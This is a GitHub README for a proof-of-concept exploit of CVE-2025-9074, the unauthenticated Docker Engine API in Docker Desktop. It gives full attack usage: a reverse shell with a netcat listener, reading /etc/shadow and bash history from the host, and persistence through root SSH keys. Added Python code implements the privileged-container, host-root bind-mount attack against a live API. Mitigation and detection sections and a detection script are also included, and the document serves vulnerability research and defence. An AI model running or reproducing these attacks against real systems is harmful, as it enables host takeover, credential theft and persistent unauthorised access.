c0gnit00/CVE-2025-9074

GitHub: c0gnit00/CVE-2025-9074

Stars: 0 | Forks: 0

# CVE-2025-9074: Docker Engine API Unauthenticated RCE

A proof-of-concept exploit for CVE-2025-9074, a vulnerability in Docker Desktop that leaves the Docker Engine API reachable without authentication. Anything that can reach the API can create a privileged container with the host filesystem bind-mounted, which amounts to a container escape and full host compromise.

## 🔴 Vulnerability Overview

CVE-2025-9074 is a critical vulnerability in Docker Desktop (fixed in 4.44.3). The Docker Engine API listens on the Docker Desktop internal network (`http://192.168.65.7:2375`) with neither authentication nor the network isolation that should separate running containers from the engine, so a malicious container on the host, or anything else that can reach that subnet, can drive the engine directly. This allows an attacker to:

- Execute arbitrary commands as root inside a privileged container
- Escape container isolation and read or write the host filesystem through a bind mount
- Establish reverse shell connections to attacker-controlled systems
- Compromise the container host and the underlying host OS

### Attack Vector

- **Network Exposure**: the Docker API is reachable on TCP port 2375 without TLS; in Docker Desktop this is the internal endpoint at `192.168.65.7`, and the same tool works against any Docker Engine whose API is exposed on 2375 (that case is a misconfiguration rather than this CVE)
- **No Authentication**: the API accepts requests without any credentials
- **Privileged Containers**: the API lets the caller create privileged containers
- **Bind Mounts**: a bind mount of the host root (`/` or `/mnt/host/c`) gives direct access to the host filesystem

## 📋 Requirements

- PHP CLI (7.0+)
- curl extension enabled in PHP
- Network connectivity to the exposed Docker API endpoint (for the Docker Desktop case, a foothold that can reach `192.168.65.7:2375`, e.g. a running container)
- Target running Docker Desktop < 4.44.3 (vulnerable version)

### System Requirements for Target

The vulnerability affects:

- **Docker Desktop for Windows** < 4.44.3
- **Docker Desktop for Mac** < 4.44.3

Any **Docker Engine** whose TCP API is exposed without TLS is reachable by the same tool, but that is a configuration error, not CVE-2025-9074.

## 🚀 Quick Start

### Installation

```bash
git clone https://github.com/c0gnit00/CVE-2025-9074.git
cd CVE-2025-9074
```

### Basic Usage

Execute a single command in a privileged container on the Docker host:

```bash
php poc.php -u http://192.168.65.7:2375 -m cmd -c "whoami"
```

### Reverse Shell

Establish an interactive reverse shell. The callback originates from the container, so the listener address must be reachable from the Docker network, not just from the host:

```bash
# Terminal 1: Start listener
nc -lvnp 4444

# Terminal 2: Run exploit
php poc.php -u http://192.168.65.7:2375 -m reverse -l 10.10.14.36 -p 4444
```

## 📖 Usage Guide

### Command Syntax

```bash
php poc.php -u <url> [options]
```

### Options

| Option | Short | Required | Description |
|--------|-------|----------|-------------|
| `--url` | `-u` | ✅ Yes | Docker API URL (e.g., `http://1.2.3.4:2375`) |
| `--mode` | `-m` | ❌ No | Execution mode: `cmd` or `reverse` (default: `cmd`) |
| `--cmd` | `-c` | ⚠️ For cmd mode | Command to execute on target |
| `--lhost` | `-l` | ⚠️ For reverse mode | Your IP address for callback |
| `--lport` | `-p` | ❌ No | Your listening port (default: 4444) |
| `--os` | — | ❌ No | Target OS: `linux`, `mac`, `windows` (default: `linux`); selects the host bind-mount path |
| `--cleanup` | — | ❌ No | Remove the container after execution |
| `--help` | `-h` | ❌ No | Display help message |

### Mode: Command Execution

Execute single commands on the target. The command runs as root inside an Alpine container; the host filesystem is available under `/mnt/hostfs`:

```bash
# Simple command
php poc.php -u http://192.168.65.7:2375 -m cmd -c "id"

# Read files from the host through the bind mount
php poc.php -u http://192.168.65.7:2375 -m cmd -c "cat /mnt/hostfs/flag.txt"

# Remove the container afterwards
php poc.php -u http://192.168.65.7:2375 -m cmd -c "whoami" --cleanup
```

### Mode: Reverse Shell

Spawn an interactive shell with callback:

```bash
php poc.php -u http://192.168.65.7:2375 -m reverse -l 192.168.1.100 -p 4444
```

### OS-Specific Examples

The container is Linux (Alpine) in every case; `--os` only changes which host path is bind-mounted to `/mnt/hostfs`.

#### Linux Target

```bash
php poc.php -u http://target:2375 -m cmd -c "cat /mnt/hostfs/etc/shadow" --os linux
```

#### Windows Target

The host `C:` drive is mounted at `/mnt/hostfs` (from `/mnt/host/c` in the Docker Desktop VM), so use Linux tools and paths, not `dir C:\`:

```bash
php poc.php -u http://target:2375 -m cmd -c "ls -la /mnt/hostfs/Users/" --os windows
```

#### macOS Target

Docker Desktop on macOS only shares the directories configured under File Sharing into its VM, so paths outside those (e.g. `/Users`) will not be visible:

```bash
php poc.php -u http://target:2375 -m cmd -c "ls -la /mnt/hostfs/Users/" --os mac
```

## 🎯 Real-World Exploitation Scenarios

### 1. Reconnaissance

```bash
# Enumerate the system the container runs on
php poc.php -u http://192.168.65.7:2375 -m cmd -c "uname -a"
php poc.php -u http://192.168.65.7:2375 -m cmd -c "whoami"
```

### 2. Credential Harvesting

```bash
# Extract sensitive files from the host
php poc.php -u http://192.168.65.7:2375 -m cmd -c "cat /mnt/hostfs/root/.bash_history"
php poc.php -u http://192.168.65.7:2375 -m cmd -c "cat /mnt/hostfs/etc/passwd"
```

### 3. Persistence

```bash
# Add an SSH key for root on the host
php poc.php -u http://192.168.65.7:2375 -m cmd -c "mkdir -p /mnt/hostfs/root/.ssh && echo 'SSH_KEY' >> /mnt/hostfs/root/.ssh/authorized_keys"
```

### 4. Lateral Movement

```bash
# Enumerate all containers. The Alpine image has no docker CLI, so query the
# (equally unauthenticated) API from inside the container with busybox wget.
php poc.php -u http://192.168.65.7:2375 -m cmd -c "wget -qO- http://192.168.65.7:2375/containers/json?all=true"
```

## 🔍 Technical Details

### Vulnerability Mechanism

1. **Exposed Docker API**: the Docker API listens on `0.0.0.0:2375` without authentication
2. **Privileged Container Creation**: the PoC creates a privileged container via `POST /containers/create` (`HostConfig.Privileged: true`)
3. **Host Filesystem Binding**: the container bind-mounts the host filesystem:
   - **Linux**: `/:/mnt/hostfs`
   - **macOS**: `/:/mnt/hostfs`
   - **Windows**: `/mnt/host/c:/mnt/hostfs`
4. **Command Execution**: the command runs as root inside the container
5. **Host Filesystem Access**: root in a privileged container has direct read/write access to everything under `/mnt/hostfs`, i.e. to the host filesystem with the VM's privileges

### Payload Flow

```
┌─────────────────────────────────────────────────────┐
│ poc.php (Your Machine)                              │
└────────────┬────────────────────────────────────────┘
             │ HTTP REST API Call
             ▼
┌─────────────────────────────────────────────────────┐
│ Docker API (Target Port 2375) [UNAUTHENTICATED]     │
└────────────┬────────────────────────────────────────┘
             │ Creates Container
             ▼
┌─────────────────────────────────────────────────────┐
│ Privileged Alpine Container                         │
│  ├─ Full Root Access                                │
│  ├─ Bind Mount: /:/mnt/hostfs                       │
│  └─ Executes Attacker Command                       │
└────────────┬────────────────────────────────────────┘
             │ Command Output
             ▼
┌─────────────────────────────────────────────────────┐
│ Output Returned to Attacker                         │
└─────────────────────────────────────────────────────┘
```

### Code Analysis

- **Docker API Interaction**: uses cURL for HTTP/1.1 REST API communication
- **Docker Log Demuxing**: handles Docker's multiplexed stream format (8-byte frame header: stream type, three zero bytes, big-endian uint32 payload length) returned by `/containers/{id}/logs` when no TTY is allocated
- **Cross-Platform Support**: adapts the bind-mount source path for Windows/Mac/Linux
- **Timeout Handling**: 60-second timeout for long-running commands

## 🛡️ Mitigation

### Immediate Actions

1. **Upgrade Docker Desktop** to version 4.44.3 or later. This is the only fix for the internal `192.168.65.7:2375` endpoint; the measures below harden a Docker Engine TCP endpoint in general.
2. **Network Isolation**
   - Restrict the Docker API port (2375) to localhost only
   - Use firewall rules to block external access
   - Do not expose the daemon socket over TCP at all unless required
3. **Enable TLS Authentication**

   Configure the Docker daemon with TLS certificates in `daemon.json`; with `tlsverify` set, the daemon rejects clients whose certificate is not signed by the configured CA, and the TCP listener should be on 2376 (plaintext 2375 removed):

   ```json
   {
     "tlsverify": true,
     "tlscacert": "/etc/docker/ca.pem",
     "tlscert": "/etc/docker/server-cert.pem",
     "tlskey": "/etc/docker/server-key.pem"
   }
   ```

4. **Network Segmentation**
   - Run Docker Desktop on isolated networks
   - Implement zero-trust network access
   - Use VPNs for remote access

### Docker Desktop Settings

- **Windows/Mac**: disable "Expose daemon on tcp://localhost:2375 without TLS" (this controls the host-side localhost listener, not the internal endpoint covered by the CVE)
- Use the Unix socket (`/var/run/docker.sock`) for local access only
- For remote access, use a Docker context that carries TLS client certificates instead of a plaintext TCP endpoint

## 📊 Detection

### Network Detection

```bash
# Scan for exposed Docker APIs
nmap -p 2375,2376 -sV target_network

# Check whether the port answers as a Docker API
curl -s http://target:2375/version
```

### Log Detection

- Monitor Docker daemon logs for unusual API calls (the daemon logs individual requests only at debug level, so an authorization plugin or API proxy is the more reliable vantage point)
- Alert on privileged container creation (`HostConfig.Privileged: true`)
- Track bind mounts whose source is the host root (`/` or `/mnt/host/<drive>`)

## ⚠️ Disclaimer

**This tool is provided for authorized security testing and educational purposes only.**

- Only use this POC on systems you own or have explicit permission to test
- Unauthorized access to computer systems is illegal
- Users assume full responsibility for their actions
- This POC is for authorized penetration testing and vulnerability research

## 📝 References

- [Docker Engine Security](https://docs.docker.com/engine/security/)
- [Docker API Documentation](https://docs.docker.com/engine/api/)
- [CVE-2025-9074 Details](https://nvd.nist.gov/vuln/detail/CVE-2025-9074)
- [CWE-306: Missing Authentication for Critical Function](https://cwe.mitre.org/data/definitions/306.html)

## 📄 License

This project is licensed under the MIT License - see the LICENSE file for details.

## 👤 Author

Security Researcher | Penetration Tester

**Last Updated**: May 2025 | **Status**: Active Research
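The create/start/wait/logs flow from the Technical Details section and the multiplexed log format the Code Analysis bullet refers to, as an added Python example. This is not the repository's PHP PoC: the endpoint paths and JSON fields are the Docker Engine API's own, while `create_body`, `request_sequence`, `demux`, `run_command` and the sample bytes in `SAMPLE_STREAM` are this example's, and the `alpine` image is assumed to already exist on the target (the create call returns 404 otherwise).

```python
"""Added example: the Docker Engine API flow the README describes, in Python.
Not the c0gnit00 PoC's PHP code. Offline by default: request bodies are built
but not sent, and the log stream below is constructed, not captured."""
import json
import struct
import urllib.request
from typing import Dict, List, Tuple

# Host-root bind mounts from the "Host Filesystem Binding" list in the README.
HOST_BINDS: Dict[str, str] = {
    "linux": "/:/mnt/hostfs",
    "mac": "/:/mnt/hostfs",
    "windows": "/mnt/host/c:/mnt/hostfs",
}


def create_body(command: str, os_name: str = "linux", image: str = "alpine") -> dict:
    """Body for POST /containers/create: privileged container, host root bind-mounted.
    Tty is off, so /containers/{id}/logs returns the multiplexed stream demux() decodes."""
    if os_name not in HOST_BINDS:
        raise ValueError(f"unknown target os {os_name!r}")
    return {
        "Image": image,
        "Cmd": ["sh", "-c", command],
        "Tty": False,
        "HostConfig": {"Privileged": True, "Binds": [HOST_BINDS[os_name]]},
    }


def request_sequence(command: str, os_name: str = "linux",
                     cid: str = "{id}") -> List[Tuple[str, str, str]]:
    """(method, path, body) in the order the flow sends them; {id} stands for the
    container id returned by the create call."""
    return [
        ("POST", "/containers/create", json.dumps(create_body(command, os_name))),
        ("POST", f"/containers/{cid}/start", ""),
        ("POST", f"/containers/{cid}/wait", ""),
        ("GET", f"/containers/{cid}/logs?stdout=1&stderr=1", ""),
    ]


def frame(stream_type: int, payload: bytes) -> bytes:
    """One frame of Docker's multiplexed stream: type byte, 3 zero bytes, u32 BE length."""
    return bytes([stream_type, 0, 0, 0]) + struct.pack(">I", len(payload)) + payload


def demux(stream: bytes) -> Tuple[bytes, bytes]:
    """Split a multiplexed log stream into (stdout, stderr).
    Type 2 is stderr; 0 (stdin echo) and 1 go to stdout. Truncated frames and
    trailing bytes raise instead of being silently dropped."""
    out, err = bytearray(), bytearray()
    pos = 0
    while pos + 8 <= len(stream):
        stream_type = stream[pos]
        size = struct.unpack(">I", stream[pos + 4:pos + 8])[0]
        pos += 8
        chunk = stream[pos:pos + size]
        if len(chunk) != size:
            raise ValueError("truncated frame in multiplexed stream")
        (err if stream_type == 2 else out).extend(chunk)
        pos += size
    if pos != len(stream):
        raise ValueError("trailing bytes after last frame")
    return bytes(out), bytes(err)


def run_command(api_url: str, command: str, os_name: str = "linux",
                timeout: int = 60) -> Tuple[int, bytes, bytes]:
    """Send the sequence to a live API (only when explicitly called).
    Returns (exit status, stdout, stderr)."""
    def call(method: str, path: str, body: str) -> bytes:
        req = urllib.request.Request(api_url + path, data=body.encode() or None,
                                     method=method,
                                     headers={"Content-Type": "application/json"})
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read()
    cid = json.loads(call("POST", "/containers/create",
                          json.dumps(create_body(command, os_name))))["Id"]
    call("POST", f"/containers/{cid}/start", "")
    status = json.loads(call("POST", f"/containers/{cid}/wait", ""))["StatusCode"]
    out, err = demux(call("GET", f"/containers/{cid}/logs?stdout=1&stderr=1", ""))
    return status, out, err


# Constructed sample stream (one stdout frame, one stderr frame), not captured output.
SAMPLE_STREAM = frame(1, b"uid=0(root) gid=0(root)\n") + frame(2, b"sh: nope: not found\n")

if __name__ == "__main__":
    print(json.dumps(create_body("id", "windows"), indent=2))
    print(demux(SAMPLE_STREAM))
```

`demux` is the part worth keeping even if you never send a request: any tool that reads container output without a TTY has to strip the 8-byte headers, and a decoder that ignores the length field will interleave stderr into stdout or swallow the tail of a frame.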
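For the Log Detection bullets under Detection, an added Python example that flags the PoC's footprint (a privileged container with a host-root bind mount) from Docker Engine inspect documents. It is not part of this repository; `is_host_root`, `audit_container`, `audit_all` and `audit_daemon` are this example's names, the `/containers/json` and `/containers/{id}/json` endpoints and the `HostConfig`/`Mounts` fields are the Docker Engine API's, and the documents in `SAMPLE_INSPECT` are constructed, not captured from a daemon.

```python
"""Added example, not part of the c0gnit00 repository: detection logic for the
PoC footprint (privileged container + host-root bind mount) over Docker Engine
inspect documents. Sample documents are constructed, not captured."""
import json
import urllib.request
from typing import Dict, List


def is_host_root(src: str) -> bool:
    """True for bind sources that hand over a whole host filesystem: `/`
    (Linux/macOS) or a Docker Desktop WSL2 drive root such as `/mnt/host/c`."""
    if not src:
        return False
    src = src.rstrip("/") or "/"
    if src == "/":
        return True
    # ['', 'mnt', 'host', 'c'] is a drive root; deeper paths are a subtree only.
    return src.startswith("/mnt/host/") and len(src.split("/")) == 4


def audit_container(doc: dict) -> List[str]:
    """Findings for one GET /containers/{id}/json document."""
    name = (doc.get("Name") or "?").lstrip("/")
    hc = doc.get("HostConfig") or {}
    findings: List[str] = []
    privileged = bool(hc.get("Privileged"))
    if privileged:
        findings.append(f"{name}: privileged container")
    # HostConfig.Binds is what the PoC sets; Mounts lists the same mount however
    # it was requested, so both are checked and merged.
    sources = {b.split(":", 1)[0] for b in hc.get("Binds") or []}
    sources |= {m.get("Source", "") for m in doc.get("Mounts") or []
                if m.get("Type") == "bind"}
    root_binds = sorted(s for s in sources if is_host_root(s))
    for src in root_binds:
        findings.append(f"{name}: host root bind mount from {src}")
    if privileged and root_binds:
        findings.append(f"{name}: matches CVE-2025-9074 PoC footprint")
    return findings


def audit_all(docs: List[dict]) -> Dict[str, List[str]]:
    """Container name -> findings, omitting clean containers."""
    result: Dict[str, List[str]] = {}
    for doc in docs:
        findings = audit_container(doc)
        if findings:
            result[(doc.get("Name") or "?").lstrip("/")] = findings
    return result


def audit_daemon(api_url: str, timeout: int = 10) -> Dict[str, List[str]]:
    """Run the same audit against a live API (only when explicitly called),
    e.g. audit_daemon("http://127.0.0.1:2375")."""
    def get(path: str):
        with urllib.request.urlopen(api_url + path, timeout=timeout) as resp:
            return json.load(resp)
    ids = [c["Id"] for c in get("/containers/json?all=true")]
    return audit_all([get(f"/containers/{cid}/json") for cid in ids])


# Constructed inspect documents, trimmed to the fields the audit reads.
SAMPLE_INSPECT = [
    {"Name": "/nervous_turing", "Config": {"Image": "alpine"},
     "HostConfig": {"Privileged": True, "Binds": ["/:/mnt/hostfs"]},
     "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/mnt/hostfs"}]},
    {"Name": "/web", "Config": {"Image": "nginx"},
     "HostConfig": {"Privileged": False,
                    "Binds": ["/srv/www:/usr/share/nginx/html:ro"]},
     "Mounts": [{"Type": "bind", "Source": "/srv/www",
                 "Destination": "/usr/share/nginx/html"}]},
    {"Name": "/win", "Config": {"Image": "alpine"},
     "HostConfig": {"Privileged": True, "Binds": ["/mnt/host/c:/mnt/hostfs"]},
     "Mounts": []},
]

if __name__ == "__main__":
    for findings in audit_all(SAMPLE_INSPECT).values():
        print("\n".join(findings))
```

Polling inspect documents catches containers that already exist; the PoC's `--cleanup` option removes its container after the command runs, so for short-lived attacks pair this with an authorization plugin or proxy that sees the `/containers/create` request itself.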